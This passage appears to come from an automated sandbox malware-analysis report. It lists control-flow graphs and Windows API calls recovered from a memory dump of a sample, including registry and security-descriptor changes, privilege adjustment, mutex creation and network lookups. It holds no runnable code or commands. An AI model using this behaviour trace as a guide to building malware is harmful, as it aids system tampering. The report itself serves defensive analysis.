                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001E33A0: VariantClear.OLEAUT32(?), ref: 001E3432
                    • Part of subcall function 001E33A0: SysFreeString.OLEAUT32(001E632B), ref: 001E345C
                    • Part of subcall function 001E33A0: SysFreeString.OLEAUT32(?), ref: 001E34D6
                    • Part of subcall function 001E33A0: VariantClear.OLEAUT32(?), ref: 001E3575
                    • Part of subcall function 001E33A0: SysFreeString.OLEAUT32(?), ref: 001E359B
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 360 1ed796-1f35ae call 1e71d1 call 1f3914 GetStartupInfoW 366 1f35b3-1f35be InterlockedCompareExchange 360->366 367 1f35d9-1f35db 366->367 368 1f35c0-1f35c2 366->368 369 1f35dc-1f35e3 367->369 370 1f35cc-1f35d7 Sleep 368->370 371 1f35c4-1f35ca 368->371 372 1f35ef-1f35f6 369->372 373 1f35e5-1f35ed _amsg_exit 369->373 370->366 371->369 374 1f35f8-1f3608 call 1f1d29 372->374 375 1f3618 372->375 376 1f361e-1f3625 373->376 380 1f360d-1f3611 374->380 375->376 377 1f3642-1f3645 376->377 378 1f3627-1f3638 _initterm 376->378 381 1f3647-1f3649 InterlockedExchange 377->381 382 1f364f-1f3655 377->382 378->377 380->376 383 1f3613 380->383 381->382 384 1f3657-1f3664 call 1e3e40 382->384 385 1f3670-1f3677 382->385 386 1f3742-1f3749 383->386 384->385 395 1f3666-1f3669 384->395 385->386 387 1f367d 385->387 389 1f374e-1f3753 call 1f3959 386->389 390 1f367f-1f3689 387->390 393 1f368b-1f368e 390->393 394 1f36da-1f36de 390->394 397 1f3690-1f3693 393->397 398 1f3695-1f369b 393->398 399 1f36eb-1f36ed 394->399 400 1f36e0-1f36e8 394->400 395->385 397->394 397->398 401 1f36aa-1f36ae 398->401 402 1f369d-1f36a1 398->402 399->390 400->399 404 1f36b0-1f36b4 401->404 405 1f36b6-1f36b8 401->405 402->401 403 1f36a3-1f36a8 402->403 403->398 406 1f36b9-1f36c1 call 1efe30 404->406 405->406 408 1f36c6-1f36d1 406->408 409 1f36d3-1f36d4 exit 408->409 410 1f371f-1f3725 408->410 409->394 411 1f3727 _cexit 410->411 412 1f372d-1f3739 410->412 411->412 412->389
                  APIs
                    • Part of subcall function 001E71D1: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001E7208
                    • Part of subcall function 001E71D1: GetCurrentProcessId.KERNEL32 ref: 001E7214
                    • Part of subcall function 001E71D1: GetCurrentThreadId.KERNEL32 ref: 001E721C
                    • Part of subcall function 001E71D1: GetTickCount.KERNEL32 ref: 001E7224
                    • Part of subcall function 001E71D1: QueryPerformanceCounter.KERNEL32(?), ref: 001E7230
                  • GetStartupInfoW.KERNEL32(?,001F71B0,0000005C), ref: 001F358E
                  • InterlockedCompareExchange.KERNEL32(001F8880,?,00000000), ref: 001F35B6
                  • Sleep.KERNEL32(000003E8), ref: 001F35D1
                  • _amsg_exit.MSVCRT ref: 001F35E7
                  • __initterm_e.LIBCMT ref: 001F3608
                  • _initterm.MSVCRT ref: 001F3631
                  • InterlockedExchange.KERNEL32(001F8880,00000000), ref: 001F3649
                    • Part of subcall function 001EFE30: Sleep.KERNELBASE(00000001), ref: 001EFE80
                    • Part of subcall function 001EFE30: SetCurrentDirectoryW.KERNELBASE(?), ref: 001EFEF3
                    • Part of subcall function 001EFE30: srand.MSVCRT ref: 001EFF04
                    • Part of subcall function 001EFE30: GetCurrentProcess.KERNEL32(?), ref: 001EFF44
                    • Part of subcall function 001EFE30: IsWow64Process.KERNELBASE(00000000), ref: 001EFF4B
                    • Part of subcall function 001EFE30: ??2@YAPAXI@Z.MSVCRT ref: 001EFF74
                    • Part of subcall function 001EFE30: ??3@YAXPAX@Z.MSVCRT ref: 001EFFB1
                    • Part of subcall function 001EFE30: ??2@YAPAXI@Z.MSVCRT ref: 001F0004
                    • Part of subcall function 001EFE30: _time64.MSVCRT ref: 001F014D
                    • Part of subcall function 001EFE30: _time64.MSVCRT ref: 001F0338
                    • Part of subcall function 001EFE30: _time64.MSVCRT ref: 001F04B4
                    • Part of subcall function 001EFE30: ExitProcess.KERNEL32 ref: 001F0706
                  • exit.MSVCRT ref: 001F36D4
                  • _cexit.MSVCRT ref: 001F3727
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 413 1e5c50-1e5c85 414 1e5ce8-1e5d0c 413->414 415 1e5c87-1e5caa 413->415 418 1e5f72-1e5f77 414->418 426 1e5d12-1e5d35 414->426 415->418 419 1e5cb0-1e5cbf 415->419 422 1e5f79-1e5f7f call 1ebc60 418->422 423 1e5f82-1e5f87 418->423 421 1e5cc2-1e5cdf LookupAccountSidW 419->421 427 1e5d55-1e5d5a 421->427 428 1e5ce1-1e5ce7 421->428 422->423 424 1e5f89-1e5f8f 423->424 425 1e5f97-1e5f9c 423->425 424->425 430 1e5f9e-1e5fa5 425->430 431 1e5fad-1e5fb5 425->431 426->418 441 1e5d3b-1e5d50 426->441 433 1e5d5c-1e5d61 427->433 434 1e5db7-1e5dba 427->434 430->431 433->434 438 1e5d63-1e5db3 call 1f1f60 memcpy * 2 433->438 436 1e5dbc-1e5dbe 434->436 437 1e5dc0 434->437 439 1e5dc2-1e5df9 call 1e1cc0 call 1f1f60 call 1e91c0 * 2 436->439 437->439 438->434 451 1e5dfb-1e5e11 call 1e91c0 439->451 452 1e5e2f-1e5e72 call 1e91c0 * 2 _time64 _localtime64 call 1e91c0 439->452 441->421 458 1e5e24-1e5e2c call 1e91c0 451->458 459 1e5e13-1e5e22 451->459 464 1e5e77-1e5e9e wcsftime 452->464 458->452 459->458 459->459 465 1e5eb4-1e5ecd call 1e91c0 464->465 466 1e5ea0 464->466 470 1e5ecf 465->470 471 1e5ee1-1e5ee5 465->471 468 1e5ea3-1e5eb2 466->468 468->465 468->468 472 1e5ed0-1e5edf 470->472 473 1e5f1f-1e5f3f call 1e91c0 call 1e8030 471->473 474 1e5ee7-1e5efd call 1e91c0 471->474 472->471 472->472 485 1e5f52-1e5f70 call 1e91c0 call 1ebc60 473->485 486 1e5f41-1e5f50 473->486 480 1e5eff 474->480 481 1e5f11-1e5f1c call 1e91c0 474->481 484 1e5f00-1e5f0f 480->484 481->473 484->481 484->484 485->418 486->485 486->486
                  APIs
                  • LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 001E5CDB
                  • memcpy.MSVCRT ref: 001E5D81
                  • memcpy.MSVCRT ref: 001E5DA6
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  • _time64.MSVCRT ref: 001E5E4C
                  • _localtime64.MSVCRT ref: 001E5E5D
                  • wcsftime.MSVCRT ref: 001E5E87
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 492 1f2870-1f2885 493 1f2887 492->493 494 1f288c-1f28bc StrChrW RegOpenKeyExW 492->494 493->494 495 1f28c2-1f28e3 GetSecurityInfo 494->495 496 1f29b2-1f29b7 494->496 497 1f28e9-1f2925 call 1e80b0 StrChrW RegOpenKeyExW 495->497 498 1f299e-1f29b0 495->498 502 1f2948-1f2968 SetNamedSecurityInfoW 497->502 503 1f2927-1f2946 RegSetValueExW 497->503 498->496 504 1f296a-1f298a 502->504 505 1f298c-1f299b 502->505 503->502 504->505 505->498
                  APIs
                  • StrChrW.SHLWAPI(?,0000005C), ref: 001F28A3
                  • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F28B8
                  • GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001F28DD
                    • Part of subcall function 001E80B0: memset.MSVCRT ref: 001E8138
                    • Part of subcall function 001E80B0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001E81B5
                  • StrChrW.SHLWAPI(?,0000005C), ref: 001F2906
                  • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F2921
                  • RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 001F2946
                  • SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 001F2962
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 645 1e33a0-1e33c7 647 1e33d2-1e33e9 645->647 648 1e33c9-1e33d1 645->648 650 1e33ef 647->650 651 1e34f5-1e3512 647->651 652 1e33f0-1e343c VariantClear 650->652 651->648 658 1e3518-1e352f 651->658 655 1e3442-1e3456 652->655 656 1e34e7-1e34ec 652->656 661 1e3462-1e3471 655->661 662 1e3458-1e345c SysFreeString 655->662 656->652 659 1e34f2 656->659 664 1e35c8-1e35dc 658->664 665 1e3535-1e357f VariantClear 658->665 659->651 666 1e3474-1e3476 661->666 662->661 671 1e35bf-1e35c2 665->671 672 1e3581-1e3595 665->672 669 1e34dc-1e34e2 666->669 670 1e3478-1e3490 666->670 669->656 674 1e34d2-1e34d6 SysFreeString 670->674 675 1e3492-1e34bb call 1e91c0 670->675 671->664 671->665 678 1e3597-1e35a9 SysFreeString call 1e33a0 672->678 679 1e35b4-1e35bc 672->679 674->669 684 1e34bd-1e34cd 675->684 685 1e34cf 675->685 682 1e35ae-1e35b1 678->682 679->671 682->679 684->674 685->674
                  APIs
                  • VariantClear.OLEAUT32(?), ref: 001E3575
                  • SysFreeString.OLEAUT32(?), ref: 001E359B
                    • Part of subcall function 001E33A0: VariantClear.OLEAUT32(?), ref: 001E3432
                    • Part of subcall function 001E33A0: SysFreeString.OLEAUT32(001E632B), ref: 001E345C
                    • Part of subcall function 001E33A0: SysFreeString.OLEAUT32(?), ref: 001E34D6
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 687 1e80b0-1e80fb 689 1e8101-1e812b 687->689 690 1e825f-1e826a 687->690 689->690 694 1e8131-1e8192 memset 689->694 693 1e826c-1e8271 690->693 695 1e8273-1e827f 693->695 696 1e8282-1e8287 693->696 700 1e8198-1e81bb SetSecurityInfo 694->700 701 1e825a-1e825d 694->701 695->696 698 1e8289-1e828f 696->698 699 1e8297-1e829c 696->699 698->699 702 1e829e-1e82a5 699->702 703 1e82ad-1e82b2 699->703 700->701 704 1e81c1-1e81c4 700->704 701->690 701->693 702->703 705 1e82b4-1e82c0 703->705 706 1e82c3-1e82cb 703->706 704->701 707 1e81ca-1e81ea 704->707 705->706 707->690 710 1e81ec-1e8202 call 1f3130 707->710 710->690 713 1e8204-1e8224 SetSecurityInfo 710->713 713->701 714 1e8226-1e823b call 1f3130 713->714 714->690 717 1e823d-1e8258 SetSecurityInfo 714->717 717->701
                  APIs
                  • memset.MSVCRT ref: 001E8138
                  • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001E81B5
                    • Part of subcall function 001F3130: AdjustTokenPrivileges.KERNELBASE(001E81FD,00000000,?,00000010,00000000,00000000), ref: 001F3192
                  • SetSecurityInfo.ADVAPI32(?,?,00000001,?,00000000,00000000,00000000), ref: 001E821E
                  • SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001E8256
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 718 1efe58-1efe5f 719 1efe60-1efe85 Sleep 718->719 721 1efe87-1eff19 SetCurrentDirectoryW srand call 1eeda0 call 1ebc10 719->721 730 1eff1f-1eff29 call 1e35e0 721->730 731 1f05f5-1f05fb 721->731 737 1eff3d-1eff53 GetCurrentProcess IsWow64Process 730->737 738 1eff2b-1eff38 call 1f2bc0 call 1ecab0 730->738 733 1f0601-1f064b call 1e8030 call 1f1f60 731->733 734 1f06fb-1f0706 call 1e95a0 call 1e7e10 ExitProcess 731->734 759 1f064d-1f0657 733->759 760 1f06a5-1f06f9 call 1ebc60 733->760 742 1eff68-1eff7e call 1f2f00 ??2@YAPAXI@Z 737->742 743 1eff55-1eff65 call 1eea40 737->743 738->731 757 1eff80-1eff89 call 1eeac0 742->757 758 1eff8b 742->758 743->742 761 1eff8d-1eff96 call 1e3e30 757->761 758->761 763 1f0660-1f0668 759->763 760->734 773 1effa5-1effa7 761->773 774 1eff98-1effa0 call 1ecab0 761->774 766 1f0680-1f0682 763->766 767 1f066a-1f0670 763->767 770 1f068c-1f0693 766->770 771 1f0684-1f0687 766->771 767->766 772 1f0672-1f067c 767->772 778 1f06a3 770->778 779 1f0695-1f06a0 770->779 771->770 772->763 776 1f067e 772->776 780 1effb9-1f000e call 1e1b70 call 1ebc50 ??2@YAPAXI@Z 773->780 781 1effa9-1effb6 call 1e2500 ??3@YAXPAX@Z 773->781 774->731 776->771 778->760 779->778 793 1f001f 780->793 794 1f0010-1f001d call 1e7150 780->794 781->780 796 1f0025-1f0072 call 1e91c0 call 1ef7d0 call 1e1f50 call 1e6a70 793->796 794->796 806 1f0094-1f00b4 call 1f0ce0 796->806 807 1f0074-1f008f call 1e1750 call 1efad0 call 1ecab0 796->807 806->807 813 1f00b6-1f00ff call 1e5780 806->813 807->731 820 1f0100-1f0111 813->820 821 1f0117-1f0132 call 1e95f0 820->821 822 1f05c0-1f05d3 call 1f2ad0 820->822 827 1f014c-1f0175 _time64 821->827 828 1f0134-1f0147 821->828 822->820 829 1f01e3-1f01fe call 1f1d50 827->829 830 1f0177 827->830 835 1f05a4-1f05ba 828->835 838 1f022d-1f0246 829->838 839 1f0200-1f0203 829->839 832 1f0179-1f017e 830->832 833 1f0180-1f0199 call 1eda20 830->833 832->829 832->833 845 1f01c7-1f01df 833->845 846 1f019b-1f019e 833->846 835->821 835->822 841 1f0248 838->841 842 1f0275-1f0290 call 1e4380 call 1f14c0 838->842 843 1f0205-1f0212 call 1ec980 839->843 844 1f0215-1f0228 839->844 849 1f024a-1f024f 841->849 850 1f0251-1f0269 call 1eadb0 841->850 865 1f02c5 842->865 866 1f0292-1f02c3 call 1e91c0 * 2 842->866 843->844 844->835 845->829 847 1f01a0-1f01ad call 1ec980 846->847 848 1f01b0-1f01c2 846->848 847->848 863 1f05a2 848->863 849->842 849->850 850->835 862 1f026f-1f0272 850->862 862->842 863->835 867 1f02c7-1f02f8 call 1e91c0 * 2 865->867 868 1f02fa-1f032a call 1e91c0 * 2 865->868 880 1f032b-1f0333 call 1e5a90 866->880 867->880 868->880 884 1f0336-1f034d _time64 880->884 885 1f034f-1f035c 884->885 886 1f0367-1f0398 call 1e37c0 884->886 888 1f035e 885->888 889 1f039f-1f03ac 885->889 886->889 894 1f039a 886->894 888->886 891 1f0360-1f0365 888->891 892 1f0407-1f0410 889->892 893 1f03ae 889->893 891->886 891->889 895 1f0416 892->895 896 1f04c3-1f04d0 call 1e99a0 892->896 897 1f03b0-1f03b5 893->897 898 1f03b7-1f03d4 893->898 894->889 900 1f0424-1f043e call 1ef550 call 1e9ab0 895->900 901 1f0418-1f041e 895->901 896->863 908 1f04d6-1f04e9 call 1e5a90 896->908 897->892 897->898 898->892 902 1f03d6 898->902 918 1f0440-1f0471 call 1e91c0 * 2 900->918 919 1f0473-1f04a3 call 1e91c0 * 2 900->919 901->896 901->900 905 1f03df-1f0401 call 1e2030 902->905 906 1f03d8-1f03dd 902->906 905->892 914 1f0574-1f058b call 1f0ce0 905->914 906->892 906->905 908->863 917 1f04ef-1f0500 call 1e7560 908->917 924 1f058d-1f0597 914->924 925 1f05d8-1f05f3 call 1e1750 call 1efad0 call 1ecab0 914->925 932 1f0506-1f050d 917->932 933 1f0599-1f05a0 917->933 938 1f04a4-1f04c0 call 1e5a90 call 1ebc60 _time64 918->938 919->938 924->863 925->731 932->925 936 1f0513-1f051f 932->936 933->863 933->925 940 1f0521-1f052e 936->940 941 1f0530-1f0535 936->941 938->896 943 1f0537-1f053b 940->943 941->943 944 1f0540-1f0548 941->944 943->944 948 1f0562-1f056c 944->948 949 1f054a-1f0560 944->949 948->884 951 1f0572 948->951 949->944 949->948 951->863
                  APIs
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6386
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E639E
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64AC
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B2
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B8
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E64F9
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6517
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6538
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E660F
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E6618
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E661E
                    • Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BA3
                    • Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BB2
                    • Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BC9
                    • Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BE8
                    • Part of subcall function 001E1F50: memcpy.MSVCRT ref: 001E1FEC
                    • Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6A86
                    • Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6AA1
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BB0
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BDE
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6C48
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6CA1
                    • Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFB8D
                    • Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFBA4
                    • Part of subcall function 001E5780: ??2@YAPAXI@Z.MSVCRT ref: 001E57D5
                    • Part of subcall function 001E5780: ??3@YAXPAX@Z.MSVCRT ref: 001E582F
                    • Part of subcall function 001EDA20: ??2@YAPAXI@Z.MSVCRT ref: 001EDA7A
                    • Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDAB9
                    • Part of subcall function 001EDA20: _time64.MSVCRT ref: 001EDADB
                    • Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDB0B
                    • Part of subcall function 001F1D50: ??2@YAPAXI@Z.MSVCRT ref: 001F1D7F
                    • Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1DBE
                    • Part of subcall function 001F1D50: _time64.MSVCRT ref: 001F1DE0
                    • Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1E0D
                    • Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EADEF
                    • Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EAF9A
                    • Part of subcall function 001F14C0: WSAStartup.WS2_32(00000202,?), ref: 001F14E2
                    • Part of subcall function 001F14C0: gethostname.WS2_32(?,000000FF), ref: 001F1502
                    • Part of subcall function 001F14C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 001F1522
                    • Part of subcall function 001F14C0: freeaddrinfo.WS2_32(00000000), ref: 001F1580
                    • Part of subcall function 001F14C0: WSACleanup.WS2_32 ref: 001F1586
                    • Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F
                    • Part of subcall function 001E37C0: memcpy.MSVCRT ref: 001E3CA0
                    • Part of subcall function 001E2030: ??2@YAPAXI@Z.MSVCRT ref: 001E207A
                    • Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E2176
                    • Part of subcall function 001E2030: _time64.MSVCRT ref: 001E21A8
                    • Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E21CF
                    • Part of subcall function 001E9AB0: WSAStartup.WS2_32(00000202,?), ref: 001E9ADA
                    • Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000,001F043A), ref: 001E9B3B
                    • Part of subcall function 001E9AB0: getaddrinfo.WS2_32(001F043A,00000000,?,00000000), ref: 001E9BD6
                    • Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000), ref: 001E9C1E
                    • Part of subcall function 001E9AB0: WSACleanup.WS2_32 ref: 001E9C44
                    • Part of subcall function 001F2AD0: ??2@YAPAXI@Z.MSVCRT ref: 001F2ADD
                    • Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2B54
                    • Part of subcall function 001F2AD0: _time64.MSVCRT ref: 001F2B82
                    • Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2BAA
                    • Part of subcall function 001EEAC0: CoCreateInstance.OLE32(001F708C,00000000,00000001,001F6E7C,00000004,001F8880,000003E7,001EFF87), ref: 001EEB17
                    • Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C56
                    • Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C90
                    • Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2CDB
                    • Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D75
                    • Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D8A
                    • Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D9E
                  • Sleep.KERNELBASE(00000001), ref: 001EFE80
                  • SetCurrentDirectoryW.KERNELBASE(?), ref: 001EFEF3
                  • srand.MSVCRT ref: 001EFF04
                    • Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEDF2
                    • Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEE19
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE47
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE6F
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE97
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEBF
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEE7
                    • Part of subcall function 001EBC10: CoInitializeEx.OLE32(00000000,00000000), ref: 001EBC14
                    • Part of subcall function 001EBC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 001EBC33
                  • GetCurrentProcess.KERNEL32(?), ref: 001EFF44
                  • IsWow64Process.KERNELBASE(00000000), ref: 001EFF4B
                  • ??2@YAPAXI@Z.MSVCRT ref: 001EFF74
                  • ??3@YAXPAX@Z.MSVCRT ref: 001EFFB1
                  • ??2@YAPAXI@Z.MSVCRT ref: 001F0004
                  • _time64.MSVCRT ref: 001F014D
                  • _time64.MSVCRT ref: 001F0338
                  • _time64.MSVCRT ref: 001F04B4
                    • Part of subcall function 001EC980: _itow.MSVCRT ref: 001EC999
                  • ExitProcess.KERNEL32 ref: 001F0706
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                    • Part of subcall function 001E35E0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,001F8880,000003E7), ref: 001E3622
                    • Part of subcall function 001E35E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 001E366B
                    • Part of subcall function 001E35E0: ExitProcess.KERNEL32 ref: 001E368E
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001E95A0: FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
